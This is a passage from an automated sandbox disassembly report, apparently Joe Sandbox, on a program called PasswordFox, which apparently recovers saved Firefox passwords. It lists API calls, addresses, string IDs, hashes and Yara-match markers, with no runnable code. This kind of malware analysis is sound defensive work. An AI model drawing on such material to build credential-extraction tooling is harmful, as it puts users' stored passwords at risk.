                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040AE92
                                        • FreeLibrary.KERNEL32(00000000,?,75C08FB0,0040329A,00000000), ref: 0040AEAA
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: SHAutoComplete$shlwapi.dll
                                        • API String ID: 145871493-1506664499
                                        APIs
                                          • Part of subcall function 00404991: memset.MSVCRT ref: 0040499F
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,00402501,?,0040933F,00000000,?,?,?,?,004095D3), ref: 0040607B
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,00402501,?,0040933F,00000000,?,?,?,?,004095D3), ref: 004060A2
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,00402501,?,0040933F,00000000,?,?,?,?,004095D3), ref: 004060C3
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,00402501,?,0040933F,00000000,?,?,?,?,004095D3), ref: 004060E4
                                        Similarity
                                        • API ID: ??2@$memset
                                        • String ID: ]`@
                                        • API String ID: 1860491036-2281983686
                                        APIs
                                        Similarity
                                        • API ID: memsetwcslen$wcscatwcscpy
                                        • String ID: nss3.dll
                                        • API String ID: 1250441359-2492180550
                                        APIs
                                        • GetParent.USER32(?), ref: 00405710
                                        • GetWindowRect.USER32(?,?), ref: 0040571D
                                        • GetClientRect.USER32(00000000,?), ref: 00405728
                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00405738
                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405754
                                        Similarity
                                        • API ID: Window$Rect$ClientParentPoints
                                        • String ID:
                                        • API String ID: 4247780290-0
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406114
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406122
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406133
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 0040614A
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406153
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        APIs
                                        • BeginDeferWindowPos.USER32(00000006), ref: 004033A8
                                          • Part of subcall function 004016C5: GetDlgItem.USER32(?,?), ref: 004016D5
                                          • Part of subcall function 004016C5: GetClientRect.USER32(?,?), ref: 004016E7
                                          • Part of subcall function 004016C5: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401751
                                        • EndDeferWindowPos.USER32(?), ref: 0040341F
                                        • InvalidateRect.USER32(?,?,00000001), ref: 0040342A
                                        Similarity
                                        • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                        • String ID: $
                                        • API String ID: 2498372239-3993045852
                                        APIs
                                        • memset.MSVCRT ref: 0040750F
                                        • memset.MSVCRT ref: 00407526
                                          • Part of subcall function 00406B6D: wcscpy.MSVCRT ref: 00406B72
                                          • Part of subcall function 00406B6D: _wcslwr.MSVCRT ref: 00406B93
                                        • _snwprintf.MSVCRT ref: 00407555
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                        Similarity
                                        • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                        • String ID: </%s>
                                        • API String ID: 168708657-259020660
                                        APIs
                                        • memset.MSVCRT ref: 00405962
                                        • GetPrivateProfileStringW.KERNEL32(0040FDA8,00000000,0040C3EC,?,00001000,0040FB98), ref: 00405988
                                        • wcscpy.MSVCRT ref: 004059A2
                                        Similarity
                                        • API ID: PrivateProfileStringmemsetwcscpy
                                        • String ID: `$@
                                        • API String ID: 2806480022-815968772
                                        APIs
                                          • Part of subcall function 00404592: memset.MSVCRT ref: 0040459C
                                          • Part of subcall function 00404592: wcscpy.MSVCRT ref: 004045DC
                                        • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040107C
                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 0040109A
                                        Similarity
                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                        • String ID: MS Sans Serif
                                        • API String ID: 210187428-168460110
                                        APIs
                                        Similarity
                                        • API ID: ClassName_wcsicmpmemset
                                        • String ID: edit
                                        • API String ID: 2747424523-2167791130
                                        APIs
                                        • LoadLibraryW.KERNEL32(shell32.dll,0040957E), ref: 0040ACAB
                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040ACC0
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                        • API String ID: 2574300362-880857682
                                        APIs
                                          • Part of subcall function 0040652D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040654F
                                          • Part of subcall function 0040652D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004065E4
                                        • wcslen.MSVCRT ref: 00407D10
                                        • _wtoi.MSVCRT(?), ref: 00407D1C
                                        • _wcsicmp.MSVCRT ref: 00407D6A
                                        • _wcsicmp.MSVCRT ref: 00407D7B
                                        Similarity
                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                        • String ID:
                                        • API String ID: 1549203181-0
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401490,?,?,?,?,0040DA78,0000000C), ref: 0040526E
                                        • memset.MSVCRT ref: 0040527F
                                        • memcpy.MSVCRT(0040F2B0,?,00000000,00000000,00000000,00000000,00000000,?,?,00401490,?,?,?,?,0040DA78,0000000C), ref: 0040528B
                                        • ??3@YAXPAX@Z.MSVCRT ref: 00405298
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID:
                                        • API String ID: 1865533344-0
                                        • Opcode ID: af406a04a4b50c514b405494a77c7ae63ce10921d1a9d2c14b4e3b54fe6e2e40
                                        • Instruction ID: 6c8d8dc775e92071ce88189a1a733c574a093dd66673860a6709b5512b2c3d78
                                        • Opcode Fuzzy Hash: af406a04a4b50c514b405494a77c7ae63ce10921d1a9d2c14b4e3b54fe6e2e40
                                        • Instruction Fuzzy Hash: CE114F712046019FD328DF1DC881A27F7E5EFD8314B24892EE59A97395D735E841CF54
                                        APIs
                                        • SHGetMalloc.SHELL32(?), ref: 0040AE02
                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040AE34
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AE48
                                        • wcscpy.MSVCRT ref: 0040AE5B
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                        • String ID:
                                        • API String ID: 3917621476-0
                                        • Opcode ID: 8531b8b96a5ff0b16edbb0b48f9d725383d9776768608dab97c6698888b3ab15
                                        • Instruction ID: 01b55f20cceb296a23f5d1b4378d9ed000a8bdefdfddbcb88ab9166c3752c1de
                                        • Opcode Fuzzy Hash: 8531b8b96a5ff0b16edbb0b48f9d725383d9776768608dab97c6698888b3ab15
                                        • Instruction Fuzzy Hash: 2411E8B5900208EFDB00DFA9D9889AEB7F8EB48314F10446AE905E7251D7389A45CFA9
                                        APIs
                                          • Part of subcall function 004053F1: GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 00405430
                                          • Part of subcall function 004053F1: LoadStringW.USER32(00000000,00000006,?,?), ref: 004054C9
                                          • Part of subcall function 004053F1: memcpy.MSVCRT(00000000,00000002), ref: 00405509
                                        • _snwprintf.MSVCRT ref: 00407FF2
                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00408057
                                          • Part of subcall function 004053F1: wcscpy.MSVCRT ref: 00405472
                                          • Part of subcall function 004053F1: wcslen.MSVCRT ref: 00405490
                                          • Part of subcall function 004053F1: GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 0040549E
                                        • _snwprintf.MSVCRT ref: 0040801D
                                        • wcscat.MSVCRT ref: 00408030
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                        • String ID:
                                        • API String ID: 822687973-0
                                        • Opcode ID: cecf6b3ba9b2bc983d970857ae202e2e7dcdb805c80cf490bf672af551e5d286
                                        • Instruction ID: 7d62326514c30f2996f5644e502fbb67f1eebbbaea245bd59ac79611c45167cd
                                        • Opcode Fuzzy Hash: cecf6b3ba9b2bc983d970857ae202e2e7dcdb805c80cf490bf672af551e5d286
                                        • Instruction Fuzzy Hash: EA01B1B25003086BE720B365DC86FBB73ACDB40748F00047AB719F21C3DA38A9558A6D
                                        APIs
                                        • memset.MSVCRT ref: 0040217F
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 0040219C
                                        • strlen.MSVCRT ref: 004021AE
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004021BF
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: 6cb8a34a761912faa8ac38dee8a575437cfbeb5ecd169eee6093785f45105e23
                                        • Instruction ID: 5b4a580a9afbc116114165902e6f407056a70142a6cda248b66e7e205d5b1b91
                                        • Opcode Fuzzy Hash: 6cb8a34a761912faa8ac38dee8a575437cfbeb5ecd169eee6093785f45105e23
                                        • Instruction Fuzzy Hash: 68F0F9B640122CBEEB05ABD49DC9DEB77ACDB04254F0002B6B719E2092D6749F44CBA9
                                        APIs
                                        • memset.MSVCRT ref: 00406C08
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,0040C57C,?,?,?,?,?,004022DF), ref: 00406C21
                                        • strlen.MSVCRT ref: 00406C33
                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,004022DF,?,?,00000008), ref: 00406C44
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: 5aa5a3b3c08058aebe5663790a2d456f728e6c27c00bfa616eb4cab50e3aca0f
                                        • Instruction ID: ca73ae1933ecf1bbfb280cec36af4ac0c48ef5680dcacbfd9dbc6e772decb399
                                        • Opcode Fuzzy Hash: 5aa5a3b3c08058aebe5663790a2d456f728e6c27c00bfa616eb4cab50e3aca0f
                                        • Instruction Fuzzy Hash: 08F0A9B640122CBEEB059B949DC9DEB77ACDB04254F0042B6B719E2192D6749F44CBA8
                                        APIs
                                          • Part of subcall function 004046B2: memset.MSVCRT ref: 004046D1
                                          • Part of subcall function 004046B2: GetClassNameW.USER32(?,00000000,000000FF), ref: 004046E8
                                          • Part of subcall function 004046B2: _wcsicmp.MSVCRT ref: 004046FA
                                        • SetBkMode.GDI32(?,00000001), ref: 0040A84C
                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 0040A85A
                                        • SetTextColor.GDI32(?,00C00000), ref: 0040A868
                                        • GetStockObject.GDI32(00000000), ref: 0040A870
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                        • String ID:
                                        • API String ID: 764393265-0
                                        • Opcode ID: 627533290ad874b04cae142c4f1d449b0d86b414305bd16aaac97a702ec6867f
                                        • Instruction ID: 14f035e3676bdca9974515920c8ce13e1728c692c7fe0e77eb57e171f9705ac8
                                        • Opcode Fuzzy Hash: 627533290ad874b04cae142c4f1d449b0d86b414305bd16aaac97a702ec6867f
                                        • Instruction Fuzzy Hash: 5DF08C32100209FBCF253FA5DC09A9E3B25AF04361F10C236FA15741F1CA7988A0DA49
                                        APIs
                                        • memcpy.MSVCRT(0040F5C8,?,00000050,?,004014D4,?), ref: 00409E27
                                        • memcpy.MSVCRT(0040F2F8,?,000002CC,0040F5C8,?,00000050,?,004014D4,?), ref: 00409E39
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00409E4C
                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_00009B23,00000000), ref: 00409E60
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memcpy$DialogHandleModuleParam
                                        • String ID:
                                        • API String ID: 1386444988-0
                                        • Opcode ID: 07a75c4b686bdf10da6d20a7fa06ca80fffb70e214758e8830736ea6c9825698
                                        • Instruction ID: f944e8ee28cea8addfebdb5eace4f3b51803774482c945df87ae2f44757a6356
                                        • Opcode Fuzzy Hash: 07a75c4b686bdf10da6d20a7fa06ca80fffb70e214758e8830736ea6c9825698
                                        • Instruction Fuzzy Hash: 66F08931654310BBD760AB54BC06F5636A0E744F12F24057AFA41B50D1D3BA0595CBCC
                                        APIs
                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00408D2E
                                        • SetFocus.USER32(?,0040D124,?), ref: 00408DCA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FocusMessageSend
                                        • String ID: Q.@
                                        • API String ID: 223698058-4024751401
                                        • Opcode ID: 373d8ffff2fe50eca12e560ce30c295213923caf74c15fb5872483c6e38fe0cd
                                        • Instruction ID: ea227be7026451b4e5dbc1450cab4db2f21189eb84d5aa359695cb02a96ede71
                                        • Opcode Fuzzy Hash: 373d8ffff2fe50eca12e560ce30c295213923caf74c15fb5872483c6e38fe0cd
                                        • Instruction Fuzzy Hash: C351B4306002049ADB30AB25C989FEE72A25B50B68F52417FF1997F2E2CF795C858B4D
                                        APIs
                                        • wcschr.MSVCRT ref: 00406C90
                                        • wcschr.MSVCRT ref: 00406C9E
                                          • Part of subcall function 00404EEB: wcslen.MSVCRT ref: 00404F07
                                          • Part of subcall function 00404EEB: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,00406CE6,?), ref: 00404F2A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcschr$memcpywcslen
                                        • String ID: "
                                        • API String ID: 1983396471-123907689
                                        • Opcode ID: da2ba4c61535efc9af471724ec7600097bc8c61c473a7b97c8991c2fd6d2e592
                                        • Instruction ID: 4bf1fa089a2ee370b459162281fe9c31dc42728a176ac04e87decefd6409daad
                                        • Opcode Fuzzy Hash: da2ba4c61535efc9af471724ec7600097bc8c61c473a7b97c8991c2fd6d2e592
                                        • Instruction Fuzzy Hash: 96319275904214EFDF14EF65C8419EE7BF8EF44324B21427BE812BB1C1D778AA518A98
                                        APIs
                                        • _snwprintf.MSVCRT ref: 00404B60
                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 00404B70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _snwprintfmemcpy
                                        • String ID: %2.2X
                                        • API String ID: 2789212964-323797159
                                        • Opcode ID: c99066928f9437aa7e551033cabbef0df198b6f8c8e597af9a43f68327a4c180
                                        • Instruction ID: a9002b0875575303a2987026f9fb1bf175ac1b43a81178ecf4e49226d2ebb4fd
                                        • Opcode Fuzzy Hash: c99066928f9437aa7e551033cabbef0df198b6f8c8e597af9a43f68327a4c180
                                        • Instruction Fuzzy Hash: E9115272900209BFDB50DFE8C882AAF73B9FB44714F108476EE15E7181D678EA158B95
                                        APIs
                                        • _snwprintf.MSVCRT ref: 00406ECE
                                        • _snwprintf.MSVCRT ref: 00406EEE
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _snwprintf$FileWritewcslen
                                        • String ID: %%-%d.%ds
                                        • API String ID: 889019245-2008345750
                                        • Opcode ID: 868302a9e02cd75f8354f8058d42a64734ba0f68fa388504d18fbb5dae66fb0c
                                        • Instruction ID: e143721a560c24b574496b3a283ef396d45c0151d4c93298e099853d173d25ff
                                        • Opcode Fuzzy Hash: 868302a9e02cd75f8354f8058d42a64734ba0f68fa388504d18fbb5dae66fb0c
                                        • Instruction Fuzzy Hash: A4019275240304AFDB10AB59CC82D5A77E9EB88318B01053EF946A72A2D635F951DBA8
                                        APIs
                                        • memset.MSVCRT ref: 00405FF5
                                        • SendMessageW.USER32(00403113,0000105F,00000000,?), ref: 00406023
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessageSendmemset
                                        • String ID: "
                                        • API String ID: 568519121-123907689
                                        • Opcode ID: 2ae622bd2626f1aacff70f59a86f4a341843bd16d34e56bfea62d70f55bee892
                                        • Instruction ID: bc73b25eccc6807c1a63795b29de817f78dd97bbc701bd9d2aad54656d2c4010
                                        • Opcode Fuzzy Hash: 2ae622bd2626f1aacff70f59a86f4a341843bd16d34e56bfea62d70f55bee892
                                        • Instruction Fuzzy Hash: 3601A275900205EBDB20CF45C885EABB7B8FF80745F11402AE881B6281D3359E95CB79
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: TextWindowmemset
                                        • String ID: caption
                                        • API String ID: 2590972913-4135340389
                                        • Opcode ID: 0fcc5cf7fb10eb742ef7212aa95dbfacf46bc68522d4b0609645f212bcb06b33
                                        • Instruction ID: df80af938675ecbf3287059fad7e6b069a73c638d1509468611f52464be81b01
                                        • Opcode Fuzzy Hash: 0fcc5cf7fb10eb742ef7212aa95dbfacf46bc68522d4b0609645f212bcb06b33
                                        • Instruction Fuzzy Hash: 32F08132940718AAFB207790DC8EB973668DB04710F444076FE04B61D2D7B8AD84CE9C
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PlacementWindowmemset
                                        • String ID: WinPos
                                        • API String ID: 4036792311-2823255486
                                        APIs
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00408C8C
                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00408C9C
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: ??3@CurrentDirectory
                                        • String ID: ]`@
                                        • API String ID: 3082378999-2281983686
                                        APIs
                                        • memset.MSVCRT ref: 004058F6
                                        • _itow.MSVCRT ref: 00405904
                                          • Part of subcall function 0040593F: memset.MSVCRT ref: 00405962
                                          • Part of subcall function 0040593F: GetPrivateProfileStringW.KERNEL32(0040FDA8,00000000,0040C3EC,?,00001000,0040FB98), ref: 00405988
                                          • Part of subcall function 0040593F: wcscpy.MSVCRT ref: 004059A2
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: memset$PrivateProfileString_itowwcscpy
                                        • String ID: `$@
                                        • API String ID: 3901012872-815968772
                                        APIs
                                          • Part of subcall function 0040455F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00404577,?,00403725,?,00000104), ref: 0040456A
                                        • wcsrchr.MSVCRT ref: 00405ED9
                                        • wcscat.MSVCRT ref: 00405EEF
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: FileModuleNamewcscatwcsrchr
                                        • String ID: _lng.ini
                                        • API String ID: 383090722-1948609170
                                        APIs
                                        • wcslen.MSVCRT ref: 00404DC7
                                        • free.MSVCRT ref: 00404DEA
                                          • Part of subcall function 004044DF: malloc.MSVCRT ref: 004044FB
